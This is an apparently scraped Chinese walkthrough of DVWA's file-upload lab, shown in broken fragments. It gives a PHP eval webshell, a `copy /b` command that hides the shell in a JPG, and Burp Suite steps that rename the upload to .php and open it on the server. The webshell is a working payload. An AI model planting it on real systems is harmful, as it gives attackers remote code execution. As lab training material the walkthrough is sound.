一、 随便找一张jpg图片
二、 新建一个txt文档
三、 在文本文档中写入一句话木马
本次实验使用的木马为password
<?php @eval($_POST['密码']);?>
password
<?php @eval($_POST['密码']);?>
cd C:\muma
copy 图片.jpg/b + 木马.php/a 合成.jpg
muma.jpg
admin
password
DVWA Security
更改安全性 改为low
点击 Submit
确定File Upload
(文件上传)FoxyProxy
的Burp
代理打开burpsuite
即可打开Proxy
(代理)再点击Intercept
(截断)之后等待数据包muma.jpg
文件 然后点击上传
或者(Upload)muma.jpg
改为muma.php
然后点击右上角的放包
(Forward)一直点击 直到变成灰色无法点击为止../../hackable/uploads/muma.php
/xxx.xxx.xxx.xxx/DVWA/vulnerabilities/upload#
../
的意思为返回上一级目录 两个../../
代表返回前两个目录 也就代表返回到了/xxx.xxx.xxx.xxx/DVWA/
目录/xxx.xxx.xxx.xxx/DVWA/hackable/uploads/muma.php